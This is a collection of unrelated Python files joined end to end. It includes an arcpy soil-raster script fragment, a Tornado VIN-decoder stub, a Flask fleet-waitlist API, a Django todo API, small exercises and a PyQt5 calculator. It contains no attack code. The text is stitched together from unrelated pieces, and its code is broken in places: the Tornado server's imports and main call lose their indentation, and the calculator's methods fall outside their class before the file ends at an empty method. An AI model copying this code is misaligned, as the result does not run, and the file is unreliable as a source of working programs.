                        arcpy.JoinField_management(Basin_gSSURGO_Raster, "MUKEY", join_table, "MUKEY", "hydgrpdcd")
                        print 'Join successful!'
                    else:
                        print 'error = ' + x.message
                # Process: Table to Table
                print 'Converting to .dbf table...'
                # Process: Table to Table
                arcpy.TableToTable_conversion(Basin_gSSURGO_Raster, Model_Output_gdb, "out_table.dbf", "", "VALUE \"VALUE\" false true true 0 Long 0 0 ,First,#,,VALUE,-1,-1,,Value,-1,-1;COUNT \"COUNT\" false true true 0 Long 0 0 ,First,#,,COUNT,-1,-1,,Count,-1,-1;MUKEY \"MUKEY\" true true false 30 Text 0 0 ,First,#,,MUKEY,-1,-1;hydgrpdcd \"Hydrologic Group - Dominant Conditions\" true true false 254 Text 0 0 ,First,#,,hydgrpdcd,-1,-1", "")
                # Process: output csv file
                print 'Creating '+ ch5id + '_gSSURGO.csv file...'
                rows = arcpy.SearchCursor(Model_Output_gdb + '\\out_table.dbf')
                #check if output file already exits
                if os.path.isfile(output_dir + ch5id + '_gSSURGO.csv') == True:
                    print 'Appending data to existing basin csv file...'
                    header = True
                else:
                    header = False
                # 'ab' = append binary mode (Python 2 csv convention)
                ssurgo_csv = open(output_dir + ch5id + '_gSSURGO.csv', 'ab')
                csvFile = csv.writer(ssurgo_csv) #output csv
                fieldnames = [f.name for f in arcpy.ListFields(Model_Output_gdb+ '\\out_table.dbf')]
                allRows = []
                for row in rows:
                    rowlist = []
                    for field in fieldnames:
                        rowlist.append(row.getValue(field))
                    allRows.append(rowlist)
                # Only write the header row for newly created files
                if header == False:
                    csvFile.writerow(fieldnames)
                for row in allRows:
                    csvFile.writerow(row)
                # Release the arcpy cursor objects before the next basin
                row = None
                rows = None
                ssurgo_csv.close()
                print '\n'
print 'Script completed!!'
winsound.Beep(800,1000) # beep to indicate script is complete
|
#!/usr/bin/env python2.7
# coding:utf-8
import sys
import os
import logging
import json
try:
import tornado.ioloop
import tornado.web
import tornado.escape
from tornado.options import define, options
except ImportError:
print "Notify service need tornado, please run depend.sh"
sys.exit(1)
# Make sibling modules importable when the script is run from elsewhere.
ROOT_DIR = os.path.dirname(__file__)
sys.path.append(ROOT_DIR)
# Command-line options: --port (listen port) and --debug (tornado debug mode).
define("port", default=10089, help="run on the given port", type=int)
define('debug', default=True, help='enable debug mode')
class MainHandler(tornado.web.RequestHandler):
    """Landing page: serves a static HTML menu linking to the other routes."""
    def get(self):
        html = """
        <h1>Welcome Vin Decoder</h1>
        <br>
        <ul>
        <li><a href="/">Home</a></li>
        <li><a href="/demo">Demo</a></li>
        </ul>
        """
        self.write(html)
class DemoHandler(tornado.web.RequestHandler):
    """Demo route: redirects to a sample VIN decode request."""
    def get(self):
        self.redirect("/vin/v1/LVSHCAMB1CE054249")
class VinCodeHandler(tornado.web.RequestHandler):
    """Return vehicle details for a VIN as JSON.

    NOTE(review): the decode result below is a hard-coded sample (an Audi Q5);
    the ``vincode`` path argument is echoed back but not actually decoded.
    The result keys are Chinese vehicle-attribute labels (manufacturer, brand,
    model, VIN year, emission standard, etc.) and are part of the API contract,
    so they must not be translated.
    """
    def get(self, vincode):
        # CORS + JSON content type so browser clients can call this directly.
        self.set_header("Access-Control-Allow-Origin", "*")
        self.set_header("Content-Type", "application/json;charset=UTF-8")
        res = {
            "status": "20000000",
            "message": "ok",
            "result": {
                "vincode": vincode.encode("utf-8"),
                "厂家": "一汽大众(奥迪)",
                "品牌": "奥迪",
                "车型": "Q5",
                "VIN年份": "2013",
                "排放标准": "国4",
                "进气形式": "涡轮增压",
                "排量(升)": "2.0 T",
                "最大马力(ps)": "211",
                "驱动形式": "前置四驱",
                "变速器描述": "手自一体变速器(AMT)",
                "档位数": "8",
                "燃油类型": "汽油",
            }
        }
        # ensure_ascii=False keeps the Chinese labels readable in the payload.
        self.write(json.dumps(res, ensure_ascii=False))
def main():
    """Parse command-line options, build the tornado app and serve forever."""
    tornado.options.parse_command_line()
    settings = {
        'debug': options.debug,
    }
    application = tornado.web.Application([
        (r"/", MainHandler),
        (r"/demo", DemoHandler),
        (r"/vin/v1/(\w+)", VinCodeHandler),   # VIN captured as \w+ path group
    ], **settings)
    application.listen(options.port)
    # Blocks until the process is stopped.
    tornado.ioloop.IOLoop.instance().start()
if __name__ == "__main__":
main()
|
from flask.blueprints import Blueprint
import logging
from flask_login import login_required, current_user
import flask
from flask.globals import request
from waitlist.permissions import perm_manager
from waitlist.storage.database import CrestFleet, Waitlist, \
Character, WaitlistEntry, HistoryEntry, HistoryExtInvite, \
TeamspeakDatum
from waitlist.utility.notifications import send_notification
from waitlist.utility.history_utils import create_history_object
from waitlist.utility.fleet import spawn_invite_check, invite, member_info
from flask.json import jsonify
from waitlist.base import db
from datetime import datetime
from flask.wrappers import Response
from waitlist.utility.eve_id_utils import get_character_by_name
from flask.helpers import make_response
from waitlist.ts3.connection import move_to_safety_channel
from waitlist.utility.settings import sget_active_ts_id
from flask_babel import gettext
from ...signal import send_removed_fleet, send_removed_last_fleet
# Blueprint holding the fleet-management API endpoints (registered by the app).
bp = Blueprint('api_fleet', __name__)
logger = logging.getLogger(__name__)
# Declare and fetch the permission that gates every endpoint in this module.
perm_manager.define_permission('fleet_management')
perm_fleet_manage = perm_manager.get_permission('fleet_management')
@bp.route("/<int:fleet_id>/", methods=["DELETE"])
@login_required
@perm_fleet_manage.require(http_exception=401)
def remove_fleet(fleet_id: int):
    """Delete the CrestFleet with the given id and emit removal signals.

    Returns 404 JSON when the fleet does not exist (previously this crashed
    with an AttributeError / HTTP 500 when reading registrationTime of None).
    """
    logger.info("%s deletes crest fleet %i", current_user.username, fleet_id)
    fleet: CrestFleet = db.session.query(CrestFleet).get(fleet_id)
    if fleet is None:
        resp = flask.jsonify(status_code=404, message="Fleet not found")
        resp.status_code = 404
        return resp
    reg_time: datetime = fleet.registrationTime
    # Delete the already-loaded instance instead of issuing a second query.
    db.session.delete(fleet)
    db.session.commit()
    send_removed_fleet(remove_fleet, fleet_id, reg_time)
    # If that was the last fleet, notify listeners of the "no fleets" state.
    if db.session.query(CrestFleet).count() <= 0:
        send_removed_last_fleet(remove_fleet, fleet_id)
    return flask.jsonify(status_code=200, message="Fleet Deleted")
@bp.route("/fleet/actions/invite/<string:name>", methods=['POST'])
@login_required
@perm_fleet_manage.require()
def fleet_actions_invite(name: str):
    # Invite a character (looked up by name) into the current user's fleet,
    # trying the dps/other/sniper/logi squads in that order, and record a
    # history entry. Responds with the invite call's status code and text.
    character = get_character_by_name(name)
    fleet = current_user.fleet
    # 428 Precondition Required: the inviter must currently be fleet boss.
    if fleet is None:
        logger.info("%s tried to invite someone by name while he has no fleet",
                    current_user)
        flask.abort(428, gettext('You are not associated with a fleet!'))
    if character is None:
        logger.info('%s tried to inviate character with name=%s who does not exist.',
                    current_user,
                    name)
        flask.abort(400,
                    gettext('The character you tried to invite could not be found!'))
    logger.info("%s invites %s by name to fleet %d", current_user.username,
                name, fleet.fleetID)
    # Squad preference order for a by-name invite: dps first, logi last.
    status = invite(character.id, [(fleet.dpsWingID, fleet.dpsSquadID),
                                   (fleet.otherWingID, fleet.otherSquadID),
                                   (fleet.sniperWingID, fleet.sniperSquadID),
                                   (fleet.logiWingID, fleet.logiSquadID)])
    h_entry = create_history_object(character.get_eve_id(),
                                    HistoryEntry.EVENT_COMP_INV_BY_NAME,
                                    current_user.id)
    db.session.add(h_entry)
    # Mirror the downstream invite status in our own response.
    resp = flask.jsonify({'status': status['status_code'],
                          'message': status['text']})
    resp.status_code = status['status_code']
    return resp
@bp.route("/fleet/members/", methods=['POST'])
@login_required
@perm_fleet_manage.require(http_exception=401)
def invite_to_fleet():
    """Invite a waitlisted character into the current user's fleet.

    Form params: ``charID``, ``waitlistID``, ``groupID``.
    On success (204) records a history entry with invite timing, notifies the
    pilot and spawns a delayed check that the invite was accepted; otherwise
    relays the downstream invite status code and message.
    """
    character_id = int(request.form.get('charID'))
    waitlist_id = int(request.form.get('waitlistID'))
    group_id = int(request.form.get('groupID'))
    character = db.session.query(Character).get(character_id)
    waitlist = db.session.query(Waitlist).filter(Waitlist.id == waitlist_id).first()
    # lets check that the given wl exists
    if waitlist is None:
        logger.error("Given waitlist ID=%d is not valid.", waitlist_id)
        resp = jsonify(status_code=428,
                       message=gettext('Given waitlist ID=%(waitlist_id)d is not valid.',
                                       waitlist_id=waitlist_id))
        resp.status_code = 428
        return resp
    squad_type = waitlist.name
    logger.info("Invited %s by %s into %s", character.eve_name, current_user.username, squad_type)
    if current_user.fleet is None:
        logger.info("%s is currently not not boss of a fleet, he can't invite people.", current_user.username)
        resp = jsonify(status_code=409,
                       message=gettext('You are not currently Boss of a Fleet'))
        resp.status_code = 409
        return resp
    fleet = current_user.fleet
    # generate a list in which order squads should be preferred in case the main squad is full
    if squad_type == "logi":
        squad_id_list = [(fleet.logiWingID, fleet.logiSquadID), (fleet.otherWingID, fleet.otherSquadID),
                         (fleet.sniperWingID, fleet.sniperSquadID), (fleet.dpsWingID, fleet.dpsSquadID)]
    elif squad_type == "dps":
        squad_id_list = [(fleet.dpsWingID, fleet.dpsSquadID), (fleet.otherWingID, fleet.otherSquadID),
                         (fleet.sniperWingID, fleet.sniperSquadID), (fleet.logiWingID, fleet.logiSquadID)]
    elif squad_type == "sniper":
        squad_id_list = [(fleet.sniperWingID, fleet.sniperSquadID), (fleet.otherWingID, fleet.otherSquadID),
                         (fleet.dpsWingID, fleet.dpsSquadID), (fleet.logiWingID, fleet.logiSquadID)]
    else:
        # Bug fix: this used to wrap the jsonify() Response object inside
        # another Response(...), producing a malformed body; build the error
        # response the same way as the other error branches instead.
        resp = jsonify({'message': gettext('Unknown Squad Type')})
        resp.status_code = 415
        return resp
    # invite over crest and get back the status
    status = invite(character_id, squad_id_list)
    if status['status_code'] != 204:
        resp = jsonify({'status': status['status_code'], 'message': status['text']})
        resp.status_code = status['status_code']
    else:
        logger.info("Creating empty content response")
        resp = make_response('', 204)
    if resp.status_code != 204:  # invite failed send no notifications
        # 520 is treated as an expected transient failure and not logged
        if resp.status_code != 520:
            logger.info("Invited %s by %s into %s failed, status_code %s message %s",
                        character.eve_name, current_user.username, squad_type,
                        resp.status_code, status['text'])
        return resp
    send_notification(character_id, waitlist_id)
    h_entry = create_history_object(character.get_eve_id(), HistoryEntry.EVENT_COMP_INV_PL, current_user.id)
    h_entry.exref = waitlist.group.groupID
    # create a invite history extension
    # get wl entry for creation time
    wl_entry = db.session.query(WaitlistEntry) \
        .filter((WaitlistEntry.waitlist_id == waitlist_id) & (WaitlistEntry.user == character_id)).first()
    if wl_entry is None:
        logger.info("Waitlist Entry with ID=%d does not exist!", waitlist_id)
        return resp
    db.session.add(h_entry)
    db.session.flush()
    db.session.refresh(h_entry)
    history_ext = HistoryExtInvite()
    history_ext.historyID = h_entry.historyID
    history_ext.waitlistID = waitlist_id
    history_ext.timeCreated = wl_entry.creation
    history_ext.timeInvited = datetime.utcnow()
    db.session.add(history_ext)
    db.session.commit()
    logger.info("%s invited %s to fleet from %s.", current_user.username, character.eve_name, waitlist.group.groupName)
    # set a timer for 1min and 6s that checks if the person accepted the invite
    logger.debug("API Response for %s was %d", character.eve_name, resp.status_code)
    if resp.status_code == 204:
        try:
            spawn_invite_check(character_id, group_id, fleet.fleetID)
        except Exception:
            logger.exception('Failed to spawn invite check')
    else:
        logger.debug(f"Did not get 204 status, instead got {resp.status_code} no invite check spawned")
    return resp
@bp.route("/fleet/movetosafety/", methods=['POST'])
@login_required
@perm_fleet_manage.require(http_exception=401)
def move_fleetmembers_to_safety():
    # Move every member of the given fleet into the configured TeamSpeak
    # "safety" channel. Only the fleet's own comp may trigger this.
    fleet_id = int(request.form.get('fleetID'))
    crest_fleet = db.session.query(CrestFleet).get(fleet_id)
    if not crest_fleet.comp.get_eve_id() == current_user.get_eve_id():
        flask.abort(403, "You are not the Fleet Comp of this fleet!")
    teamspeak_id = sget_active_ts_id()
    if teamspeak_id is None:
        flask.abort(500, "No TeamSpeak Server set!")
    teamspeak: TeamspeakDatum = db.session.query(TeamspeakDatum).get(teamspeak_id)
    if teamspeak.safetyChannelID is None:
        flask.abort(500, "No TeamSpeak Safety Channel set!")
    # get the safety fleet channel id
    member = member_info.get_fleet_members(fleet_id, crest_fleet.comp)
    for charID in member:
        char_id: int = member[charID].character_id()
        char = db.session.query(Character).get(char_id)
        # Members without a local Character record cannot be matched to a
        # TeamSpeak client and are skipped.
        if char is None:
            continue
        safety_channel_id: int = teamspeak.safetyChannelID
        move_to_safety_channel(char.eve_name, safety_channel_id)
    return make_response("OK", 200)
|
#!/usr/bin/env python
"""
This is a very KLUDGY beowulf beorun'able task which unfortunately loads a lot of modules,
thus being inefficient when compared with the preferred parallel-IPython method.
Called using:
beorun /home/dstarr/src/TCP/Software/ingest_tools/beowulf_task_regenerate_vosource_xmls.py /home/dstarr/scratch/Noisification/50nois_20epch_100need_0.050mtrc_frq17.9/generated_vosource/100018609_11.6262227104.xml /home/dstarr/scratch/Noisification/50nois_20epch_100need_0.050mtrc_frq17.9/generated_vosource/100018609_11.6262227104.xml /home/dstarr/scratch/Noisification/50nois_20epch_100need_0.050mtrc_frq17.9/generated_vosource/100018609_11.6262227104.xml
"""
import os,sys
# Point the TCP pipeline at its external tools and scratch directories.
os.environ['TCP_SEX_BIN']=os.path.expandvars('$HOME/bin/sex')
os.environ['TCP_WCSTOOLS_DIR']=os.path.expandvars('$HOME/src/install/wcstools-3.6.4/bin/')
os.environ['TCP_DIR']=os.path.expandvars('$HOME/src/TCP/')
os.environ['TCP_DATA_DIR']=os.path.expandvars('$HOME/scratch/TCP_scratch/')
os.environ['CLASSPATH']=os.path.expandvars('$HOME/src/install/weka-3-5-7/weka.jar')
# Make the feature-extraction packages importable.
sys.path.append(os.path.abspath(os.environ.get("TCP_DIR") + \
                                'Software/feature_extract'))
sys.path.append(os.path.abspath(os.environ.get("TCP_DIR") + \
                                'Software/feature_extract/Code'))
from Code import *
import db_importer
class QueueTasks:
    """ Queue the tasks.
    Called by regenerate_vosource_xmls.py instead of IPython parallel code.
    """
    def main(self, xml_fpath_list):
        """
        Input: list of xml_files for processing.
        """
        # NOTE: unimplemented stub -- currently does nothing and returns None.
        # TODO: for each set of (10) xmls, write to random-filepath
        #    and store in a list for beorun
class ProcessTasks:
    """ Process the given xmls (task) described in given filepath.

    Each line of pars['task_fpath'] names one VOSource XML; thread_task()
    extracts features for one file and writes the result to a sibling
    "featured_vosource" directory.
    """
    def __init__(self, pars=None):
        # Bug fix: the default was a mutable dict ({}), which is shared across
        # every instance constructed without arguments; use a None sentinel.
        self.pars = pars if pars is not None else {}
    def thread_task(self, line):
        """ Task which is threaded.

        `line` is the path of one input XML; the featured output is written to
        <parent-of-parent>/featured_vosource/<same basename>.
        """
        signals_list = []
        gen = generators_importers.from_xml(signals_list)
        gen.generate(xml_handle=line)
        gen.sig.add_features_to_xml_string(gen.signals_list)
        # Rebuild the output path: swap the immediate parent directory
        # (e.g. "generated_vosource") for "featured_vosource".
        str_i_1 = line.rfind('/')
        str_i_2 = line.rfind('/', 0, str_i_1)
        out_fpath = "%s/featured_vosource/%s" % (line[:str_i_2], line[str_i_1+1:])
        gen.sig.write_xml(out_xml_fpath=out_fpath)
    def main(self):
        """ Read the task file and process each XML in a watchdog'd thread.

        Threads run one at a time (n_tasks_to_thread = 1); a thread older than
        max_seconds_thread_lifetime is force-joined so a hung parse cannot
        stall the whole task.
        """
        import time
        import datetime
        import threading
        import copy
        fp = open(self.pars['task_fpath'])
        lines = fp.readlines()
        fp.close()
        max_seconds_thread_lifetime = 180
        n_tasks_to_thread = 1
        running_threads = []
        # Loop until every line has been dispatched and every thread reaped.
        while ((len(lines) > 0) or
               ((len(lines) == 0) and (len(running_threads) > 0))):
            while (len(lines) > 0) and ((len(running_threads) < n_tasks_to_thread)):
                # add some running threads
                line_raw = lines.pop()
                line = line_raw.strip()
                t = threading.Thread(target=self.thread_task, args=[copy.copy(line)])
                t.start()
                now = datetime.datetime.utcnow()
                running_threads.append((now,t))
            time.sleep(3)
            i_remove_list = []
            for i,(dtime,t) in enumerate(running_threads):
                # Fix: is_alive() replaces the deprecated isAlive() alias
                # (removed in Python 3.9; is_alive exists since Python 2.6).
                if not t.is_alive():
                    i_remove_list.append(i)
                    t.join(0.01)
                else:
                    # Reap threads that exceeded their lifetime budget.
                    if dtime < (datetime.datetime.utcnow() - \
                                datetime.timedelta(seconds=max_seconds_thread_lifetime)):
                        i_remove_list.append(i)
                        t.join(0.01) # force a join regardless of thread state
            # Pop from the end so earlier indexes stay valid.
            i_remove_list.sort(reverse=True)
            for i in i_remove_list:
                running_threads.pop(i)
if __name__ == '__main__':
    # Single CLI argument: path to a file listing VOSource XML paths, one per line.
    pars = {'task_fpath':sys.argv[1]}
    pt = ProcessTasks(pars=pars)
    pt.main()
|
from django.shortcuts import render
from rest_framework.decorators import api_view
from rest_framework.response import Response
from .serializers import Todo_list_serializer
from .models import Todo_list_model
@api_view(['GET'])
def api_overview(request):
    """List the URL patterns exposed by the todo API."""
    endpoints = {
        'List': '/task-list/',
        'Detail View': '/task-detail/<int:pk>/',
        'Create': '/task-create/',
        'Update': '/task-update/<int:pk>/',
    }
    return Response(endpoints)
@api_view(['GET'])
def tasks_list(request):
    """Return every task, serialized as a JSON list."""
    queryset = Todo_list_model.objects.all()
    return Response(Todo_list_serializer(queryset, many=True).data)
@api_view(['GET'])
def task_detail(request, pk):
    """Return the single task with primary key ``pk``.

    Returns 404 JSON when no such task exists (previously the unhandled
    DoesNotExist exception produced a 500).
    """
    try:
        task = Todo_list_model.objects.get(id=pk)
    except Todo_list_model.DoesNotExist:
        return Response({'error': 'Task not found'}, status=404)
    serializer = Todo_list_serializer(task, many=False)
    return Response(serializer.data)
@api_view(['POST'])
def task_create(request):
    """Create a task from the request body.

    Returns the saved data on success, or the validation errors with HTTP 400
    on invalid input (previously invalid input fell through and returned
    ``serializer.data`` without saving, silently masking the failure).
    """
    serializer = Todo_list_serializer(data=request.data)
    if serializer.is_valid():
        serializer.save()
        return Response(serializer.data)
    return Response(serializer.errors, status=400)
@api_view(['PUT'])
def task_update(request, pk):
    """Update the task with primary key ``pk`` from the request body.

    Returns 404 JSON when the task does not exist, and the validation errors
    with HTTP 400 on invalid input (both cases previously returned 500 or
    silently skipped the save).
    """
    try:
        task = Todo_list_model.objects.get(id=pk)
    except Todo_list_model.DoesNotExist:
        return Response({'error': 'Task not found'}, status=404)
    serializer = Todo_list_serializer(instance=task, data=request.data)
    if serializer.is_valid():
        serializer.save()
        return Response(serializer.data)
    return Response(serializer.errors, status=400)
@api_view(['DELETE'])
def task_delete(request, pk):
    """Delete the task with primary key ``pk``.

    Returns 404 JSON when the task does not exist (previously the unhandled
    DoesNotExist exception produced a 500).
    """
    try:
        task = Todo_list_model.objects.get(id=pk)
    except Todo_list_model.DoesNotExist:
        return Response({'error': 'Task not found'}, status=404)
    task.delete()
    return Response('Task deleted!')
|
#Write a Python program that accepts a word from the user and reverse it
def reverse_word(word):
    """Return *word* spelled backwards (empty string reverses to itself)."""
    return word[::-1]

if __name__ == '__main__':
    # Guarding with __main__ keeps the prompt from running on import and
    # makes reverse_word() independently testable.
    word = input("Input a word to reverse: ")
    print(reverse_word(word))
    # The original printed an extra blank line after the result; keep it.
    print()
|
h = int(raw_input().strip())
m = int(raw_input().strip())
nums = ["zero", "one", "two", "three", "four", "five", "six", "seven", "eight", "nine", "ten",
"eleven", "twelve", "thirteen", "fourteen", "fifteen", "sixteen", "seventeen", "eighteen", "nineteen", "twenty",
"twenty one", "twenty two", "twenty three", "twenty four", "twenty five", "twenty six", "twenty seven", "twenty eight", "twenty nine"]
if m == 0: print "%s o' clock" % nums[h]
elif m == 1: print "one minute past %s" % nums[h]
elif m ==15: print "quarter past %s" % nums[h]
elif m == 30: print "half past %s" % nums[h]
elif m == 45: print "quarter to %s" % nums[h + 1]
elif m == 59: print "one minute to %s" % nums[h + 1]
elif m < 30: print "%s minutes past %s" % (nums[m], nums[h])
else: print "%s minutes to %s" % (nums[60 - m], nums[h + 1])
|
#!/usr/bin/env python
# -*- coding:utf-8 -*-
# Author:hua
# -*- coding:utf-8 -*-
from flask import Flask
from blue_print.users import users_blue
from blue_print.orders import orders_blue
from blue_print.kmeans import kmeans_blue
from blue_print.goods import goods_blue
from blue_print.random_tree import random_tree_blue
app = Flask(__name__)
# Register each blueprint on the app under its own URL prefix.
app.register_blueprint(users_blue, url_prefix='/users')
app.register_blueprint(orders_blue,url_prefix='/orders')
app.register_blueprint(goods_blue, url_prefix='/goods')
app.register_blueprint(kmeans_blue, url_prefix='/kmeans')
app.register_blueprint(random_tree_blue,url_prefix='/random_tree')
# @app.route('/')
# def index():
#     return "index"
if __name__ == '__main__':
    # print(app.url_map)
    app.run(debug=True)
    # To enable multithreading:
    # app.run(debug=False,threaded=True)
    # To enable multiple processes; on Windows the process count must not
    # exceed 1, otherwise an error is raised:
    # app.run(processes=1)
|
from rest_framework import serializers
from question.models import Question
class QuestionSerializer(serializers.ModelSerializer):
    """Serialize Question instances for the API."""

    class Meta:
        model = Question
        fields = ("title", "body", "publish", "update", "author", "score")
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'calculator.ui'
#
# Created by: PyQt5 UI code generator 5.15.0
#
# WARNING: Any manual changes made to this file will be lost when pyuic5 is
# run again. Do not edit this file unless you know what you are doing.
from PyQt5 import QtCore, QtGui, QtWidgets
import math
class Ui_MainWindow(object):
    def setupUi(self, MainWindow):
        """Build the calculator UI: digit keypad, operator column, display label.

        Generated by pyuic5 from calculator.ui; the button wiring at the end
        was added by hand (see the single-character command codes below).
        """
        MainWindow.setObjectName("MainWindow")
        MainWindow.resize(455, 382)
        self.centralwidget = QtWidgets.QWidget(MainWindow)
        self.centralwidget.setObjectName("centralwidget")
        # Digit buttons 0-9, laid out as a keypad grid.
        self.button1 = QtWidgets.QPushButton(self.centralwidget)
        self.button1.setGeometry(QtCore.QRect(60, 200, 51, 51))
        self.button1.setObjectName("button1")
        self.button2 = QtWidgets.QPushButton(self.centralwidget)
        self.button2.setGeometry(QtCore.QRect(130, 200, 51, 51))
        self.button2.setObjectName("button2")
        self.button3 = QtWidgets.QPushButton(self.centralwidget)
        self.button3.setGeometry(QtCore.QRect(200, 200, 51, 51))
        self.button3.setObjectName("button3")
        self.button6 = QtWidgets.QPushButton(self.centralwidget)
        self.button6.setGeometry(QtCore.QRect(200, 140, 51, 51))
        self.button6.setObjectName("button6")
        self.button5 = QtWidgets.QPushButton(self.centralwidget)
        self.button5.setGeometry(QtCore.QRect(130, 140, 51, 51))
        self.button5.setObjectName("button5")
        self.button4 = QtWidgets.QPushButton(self.centralwidget)
        self.button4.setGeometry(QtCore.QRect(60, 140, 51, 51))
        self.button4.setObjectName("button4")
        self.button9 = QtWidgets.QPushButton(self.centralwidget)
        self.button9.setGeometry(QtCore.QRect(200, 80, 51, 51))
        self.button9.setObjectName("button9")
        self.button8 = QtWidgets.QPushButton(self.centralwidget)
        self.button8.setGeometry(QtCore.QRect(130, 80, 51, 51))
        self.button8.setObjectName("button8")
        self.button7 = QtWidgets.QPushButton(self.centralwidget)
        self.button7.setGeometry(QtCore.QRect(60, 80, 51, 51))
        self.button7.setObjectName("button7")
        self.button0 = QtWidgets.QPushButton(self.centralwidget)
        self.button0.setGeometry(QtCore.QRect(60, 260, 51, 51))
        self.button0.setObjectName("button0")
        # Operator and command buttons.
        self.add = QtWidgets.QPushButton(self.centralwidget)
        self.add.setGeometry(QtCore.QRect(280, 260, 51, 51))
        self.add.setObjectName("add")
        self.division = QtWidgets.QPushButton(self.centralwidget)
        self.division.setGeometry(QtCore.QRect(280, 80, 51, 51))
        self.division.setObjectName("division")
        self.subtract = QtWidgets.QPushButton(self.centralwidget)
        self.subtract.setGeometry(QtCore.QRect(280, 200, 51, 51))
        self.subtract.setObjectName("subtract")
        self.multiply = QtWidgets.QPushButton(self.centralwidget)
        self.multiply.setGeometry(QtCore.QRect(280, 140, 51, 51))
        self.multiply.setObjectName("multiply")
        self.equals = QtWidgets.QPushButton(self.centralwidget)
        self.equals.setGeometry(QtCore.QRect(340, 260, 51, 51))
        self.equals.setObjectName("equals")
        self.Delete = QtWidgets.QPushButton(self.centralwidget)
        self.Delete.setGeometry(QtCore.QRect(130, 260, 51, 51))
        self.Delete.setObjectName("Delete")
        self.allClear = QtWidgets.QPushButton(self.centralwidget)
        self.allClear.setGeometry(QtCore.QRect(200, 260, 51, 51))
        self.allClear.setObjectName("allClear")
        # Expression/result display label.
        self.label = QtWidgets.QLabel(self.centralwidget)
        self.label.setGeometry(QtCore.QRect(60, 15, 331, 41))
        font = QtGui.QFont()
        font.setFamily("Comic Sans MS")
        font.setPointSize(12)
        self.label.setFont(font)
        self.label.setAcceptDrops(False)
        self.label.setLayoutDirection(QtCore.Qt.LeftToRight)
        self.label.setAutoFillBackground(True)
        self.label.setFrameShape(QtWidgets.QFrame.Box)
        self.label.setLineWidth(2)
        self.label.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
        self.label.setObjectName("label")
        self.label.setText('0')
        self.square = QtWidgets.QPushButton(self.centralwidget)
        self.square.setGeometry(QtCore.QRect(340, 140, 51, 51))
        self.square.setObjectName("square")
        self.mod = QtWidgets.QPushButton(self.centralwidget)
        self.mod.setGeometry(QtCore.QRect(340, 200, 51, 51))
        self.mod.setObjectName("mod")
        self.pi = QtWidgets.QPushButton(self.centralwidget)
        self.pi.setGeometry(QtCore.QRect(340, 80, 51, 51))
        self.pi.setObjectName("pi")
        MainWindow.setCentralWidget(self.centralwidget)
        self.menubar = QtWidgets.QMenuBar(MainWindow)
        self.menubar.setGeometry(QtCore.QRect(0, 0, 455, 21))
        self.menubar.setObjectName("menubar")
        MainWindow.setMenuBar(self.menubar)
        self.statusbar = QtWidgets.QStatusBar(MainWindow)
        self.statusbar.setObjectName("statusbar")
        MainWindow.setStatusBar(self.statusbar)
        self.retranslateUi(MainWindow)
        QtCore.QMetaObject.connectSlotsByName(MainWindow)
        # Route every button through the clicked() dispatcher. Non-obvious
        # single-character command codes: '=' evaluate, '$' square,
        # '%' modulo, '<' insert pi, ':' all-clear, ';' delete/backspace.
        self.button0.clicked.connect(lambda: self.clicked("0"))
        self.button1.clicked.connect(lambda: self.clicked("1"))
        self.button2.clicked.connect(lambda: self.clicked("2"))
        self.button3.clicked.connect(lambda: self.clicked("3"))
        self.button4.clicked.connect(lambda: self.clicked("4"))
        self.button5.clicked.connect(lambda: self.clicked("5"))
        self.button6.clicked.connect(lambda: self.clicked("6"))
        self.button7.clicked.connect(lambda: self.clicked("7"))
        self.button8.clicked.connect(lambda: self.clicked("8"))
        self.button9.clicked.connect(lambda: self.clicked("9"))
        self.add.clicked.connect(lambda: self.clicked("+"))
        self.division.clicked.connect(lambda: self.clicked("/"))
        self.subtract.clicked.connect(lambda: self.clicked("-"))
        self.multiply.clicked.connect(lambda: self.clicked("*"))
        self.equals.clicked.connect(lambda: self.clicked("=")) # self check
        self.square.clicked.connect(lambda: self.clicked("$")) # self check
        self.mod.clicked.connect(lambda: self.clicked("%"))
        self.pi.clicked.connect(lambda: self.clicked("<")) # self check
        self.allClear.clicked.connect(lambda: self.clicked(":")) # self check
        self.Delete.clicked.connect(lambda: self.clicked(";")) # self check
def __init__(self):
self.globalString = '0'
self.globalSet = {'+', '/', '-', '*', '=', '$',\
'%', '<', ':', ';', '.'}
self.symbolsForLengthGT0 = {'+', '/', '-', '*', '%', '.'}
self.equalLastOperator = False
def emptyGlobal(self):
return len(self.globalString) == 1 and self.globalString[0] == '0'
def lastChar(self) -> str:
if (self.emptyGlobal()): return ''
return self.globalString[-1]
def isLastCharOperator(self):
return 1 if self.lastChar() in self.globalSet else 0
def clicked(self, text):
    """Handle one keypad press.

    text is a one-character code: a digit, an arithmetic operator, or a
    special code — '$' (square), '%' (modulo), '<' (insert pi),
    ':' (all clear), ';' (delete), '=' (evaluate).
    """
    # A digit typed right after '=' starts a brand-new expression.
    if self.equalLastOperator and text.isdigit() and text != '=':
        self.clear()
        self.equalLastOperator = False
    if text.isdigit():
        # Replace the initial '0' instead of appending to it.
        if (len(self.globalString) == 1 and self.globalString[0] == '0'):
            self.globalString = text
        else:
            self.globalString += text
    elif text == ';':
        self.delete()
    elif text == ':':
        self.clear()
    # Pi may start an expression or follow an operator (but not a '.').
    elif text == '<' and (self.emptyGlobal() or\
        (self.isLastCharOperator() and self.lastChar() != '.')):
        if self.emptyGlobal():
            self.globalString = str(round(math.pi, 4))
        else:
            self.globalString += str(round(math.pi, 4))
    # A minus directly after a digit (never after another operator).
    elif text == '-' and not(self.isLastCharOperator()):
        self.globalString += text
    elif len(self.globalString) > 0:
        if not(self.isLastCharOperator()):
            if text == '$':
                # Square is rendered as the Python power operator.
                self.globalString += '**2'
            elif text == '=':
                self.equal()
            elif text in self.symbolsForLengthGT0:
                self.globalString += text
    # Refresh the on-screen label after every key press.
    self.update()
def clear(self):
self.globalString = '0'
def delete(self):
if not(self.emptyGlobal()):
self.globalString = self.globalString[:-1]
if len(self.globalString) == 0:
self.globalString = '0'
while not(self.emptyGlobal()) and not(self.lastChar().isdigit()):
self.globalString = self.globalString[:-1]
def equal(self):
if not(self.isLastCharOperator()):
try:
x = eval(self.globalString)
x = str(round(x, 5))
if x.endswith('.0'):
x = x[:-2]
self.globalString = x
except:
self.globalString = 'hehe xd noob'
self.equalLastOperator = True
def update(self):
print(self.globalString)
self.globalString = str(self.globalString)
self.label.setText(self.globalString)
def retranslateUi(self, MainWindow):
    """Set the (translatable) captions for every widget.

    Standard pyuic-generated hook: called once from setupUi and again
    whenever the application language changes.
    """
